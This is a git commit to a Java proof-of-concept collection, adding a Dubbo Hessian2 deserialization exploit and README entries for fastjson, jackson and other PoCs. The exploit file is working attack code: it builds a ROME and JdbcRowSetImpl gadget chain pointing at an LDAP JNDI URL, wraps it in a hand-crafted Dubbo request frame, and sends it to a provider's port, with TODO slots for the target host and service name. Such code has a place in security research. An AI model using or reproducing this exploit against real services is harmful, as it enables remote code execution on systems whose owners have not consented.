feat:增加dubbo-hessian2 exp

Author: threedr3am

README.md

@@ -1,7 +1,23 @@
 ### fastjson poc
 1. com.threedr3am.bug.fastjson.FastjsonSerialize 利用条件：fastjson <= 1.2.24 + Feature.SupportNonPublicField
 2. com.threedr3am.bug.fastjson.NoNeedAutoTypePoc 利用条件：fastjson < 1.2.48 不需要任何配置，默认配置通杀RCE
+3. ...
+
+### jackson poc
+package：com.threedr3am.bug.jackson
+
+### dubbo
+1. com.threedr3am.bug.dubbo.JdbcRowSetImplPoc 利用条件：存在rome依赖
 
 ### Padding Oracle CBC
 1. com.threedr3am.bug.paddingoraclecbc.PaddingOracleCBC java实现padding oracle cbc
 2. com.threedr3am.bug.paddingoraclecbc.PaddingOracleCBC2 多组的java实现padding oracle cbc
+
+### XXE
+paclage：com.threedr3am.bug.xxe
+
+### Commons-Collections
+package：com.threedr3am.bug.collections3
+
+### Java Security Manager
+package：com.threedr3am.bug.security.manager

pom.xml

@@ -183,6 +183,17 @@
         </exclusion>
       </exclusions>
     </dependency>
+
+    <dependency>
+      <groupId>com.rometools</groupId>
+      <artifactId>rome</artifactId>
+      <version>1.7.0</version>
+    </dependency>
+    <dependency>
+      <groupId>org.apache.dubbo</groupId>
+      <artifactId>dubbo</artifactId>
+      <version>2.7.3</version>
+    </dependency>
   </dependencies>
 
   <build>

src/main/java/com/threedr3am/bug/dubbo/JdbcRowSetImplPoc.java

@@ -0,0 +1,103 @@
+package com.threedr3am.bug.dubbo;
+
+import com.rometools.rome.feed.impl.EqualsBean;
+import com.rometools.rome.feed.impl.ToStringBean;
+import com.sun.rowset.JdbcRowSetImpl;
+import com.threedr3am.bug.server.LdapServer;
+import com.threedr3am.bug.utils.Reflections;
+import java.io.ByteArrayOutputStream;
+import java.io.OutputStream;
+import java.lang.reflect.Array;
+import java.lang.reflect.Constructor;
+import java.net.Socket;
+import java.util.HashMap;
+import java.util.Random;
+import org.apache.dubbo.common.io.Bytes;
+import org.apache.dubbo.common.serialize.Cleanable;
+import org.apache.dubbo.common.serialize.hessian2.Hessian2ObjectOutput;
+
+/**
+ * dubbo 默认配置，即hessian2反序列化，都可RCE
+ * @author threedr3am
+ */
+public class JdbcRowSetImplPoc {
+
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) throws Exception {
+    JdbcRowSetImpl rs = new JdbcRowSetImpl();
+    //todo 此处填写ldap url
+    rs.setDataSourceName("ldap://127.0.0.1:43658/Calc");
+    rs.setMatchColumn("foo");
+    Reflections.getField(javax.sql.rowset.BaseRowSet.class, "listeners").set(rs, null);
+
+    ToStringBean item = new ToStringBean(JdbcRowSetImpl.class, rs);
+    EqualsBean root = new EqualsBean(ToStringBean.class, item);
+
+    HashMap s = new HashMap<>();
+    Reflections.setFieldValue(s, "size", 2);
+    Class<?> nodeC;
+    try {
+      nodeC = Class.forName("java.util.HashMap$Node");
+    }
+    catch ( ClassNotFoundException e ) {
+      nodeC = Class.forName("java.util.HashMap$Entry");
+    }
+    Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
+    nodeCons.setAccessible(true);
+
+    Object tbl = Array.newInstance(nodeC, 2);
+    Array.set(tbl, 0, nodeCons.newInstance(0, root, root, null));
+    Array.set(tbl, 1, nodeCons.newInstance(0, root, root, null));
+    Reflections.setFieldValue(s, "table", tbl);
+
+    ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
+
+    // header.
+    byte[] header = new byte[16];
+    // set magic number.
+    Bytes.short2bytes((short) 0xdabb, header);
+    // set request and serialization flag.
+    header[2] = (byte) ((byte) 0x80 | 2);
+
+    // set request id.
+    Bytes.long2bytes(new Random().nextInt(100000000), header, 4);
+
+    ByteArrayOutputStream hessian2ByteArrayOutputStream = new ByteArrayOutputStream();
+    Hessian2ObjectOutput out = new Hessian2ObjectOutput(hessian2ByteArrayOutputStream);
+
+    out.writeUTF("2.0.2");
+    //todo 此处填写注册中心获取到的service全限定名、版本号、方法名
+    out.writeUTF("com.threedr3am.learn.server.boot.DemoService");
+    out.writeUTF("1.0");
+    out.writeUTF("hello");
+    //todo 方法描述不需要修改，因为此处需要指定map的payload去触发
+    out.writeUTF("Ljava/util/Map;");
+    out.writeObject(s);
+    out.writeObject(new HashMap());
+
+    out.flushBuffer();
+    if (out instanceof Cleanable) {
+      ((Cleanable) out).cleanup();
+    }
+
+    Bytes.int2bytes(hessian2ByteArrayOutputStream.size(), header, 12);
+    byteArrayOutputStream.write(header);
+    byteArrayOutputStream.write(hessian2ByteArrayOutputStream.toByteArray());
+
+    byte[] bytes = byteArrayOutputStream.toByteArray();
+
+    //todo 此处填写被攻击的dubbo服务提供者地址和端口
+    Socket socket = new Socket("127.0.0.1", 20880);
+    OutputStream outputStream = socket.getOutputStream();
+    outputStream.write(bytes);
+    outputStream.flush();
+    outputStream.close();
+  }
+}

src/main/java/com/threedr3am/bug/utils/Reflections.java

@@ -0,0 +1,68 @@
+package com.threedr3am.bug.utils;
+
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationTargetException;
+import sun.reflect.ReflectionFactory;
+
+
+@SuppressWarnings ( "restriction" )
+public class Reflections {
+
+    public static Field getField ( final Class<?> clazz, final String fieldName ) throws Exception {
+        try {
+            Field field = clazz.getDeclaredField(fieldName);
+            if ( field != null )
+                field.setAccessible(true);
+            else if ( clazz.getSuperclass() != null )
+                field = getField(clazz.getSuperclass(), fieldName);
+
+            return field;
+        }
+        catch ( NoSuchFieldException e ) {
+            if ( !clazz.getSuperclass().equals(Object.class) ) {
+                return getField(clazz.getSuperclass(), fieldName);
+            }
+            throw e;
+        }
+    }
+
+
+    public static void setFieldValue ( final Object obj, final String fieldName, final Object value ) throws Exception {
+        final Field field = getField(obj.getClass(), fieldName);
+        field.set(obj, value);
+    }
+
+
+    public static Object getFieldValue ( final Object obj, final String fieldName ) throws Exception {
+        final Field field = getField(obj.getClass(), fieldName);
+        return field.get(obj);
+    }
+
+
+    public static Constructor<?> getFirstCtor ( final String name ) throws Exception {
+        final Constructor<?> ctor = Class.forName(name).getDeclaredConstructors()[ 0 ];
+        ctor.setAccessible(true);
+        return ctor;
+    }
+
+
+    public static <T> T createWithoutConstructor ( Class<T> classToInstantiate )
+            throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
+        return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]);
+    }
+
+
+    @SuppressWarnings ( {
+        "unchecked"
+    } )
+    public static <T> T createWithConstructor ( Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes,
+            Object[] consArgs ) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
+        Constructor<? super T> objCons = constructorClass.getDeclaredConstructor(consArgTypes);
+        objCons.setAccessible(true);
+        Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);
+        sc.setAccessible(true);
+        return (T) sc.newInstance(consArgs);
+    }
+
+}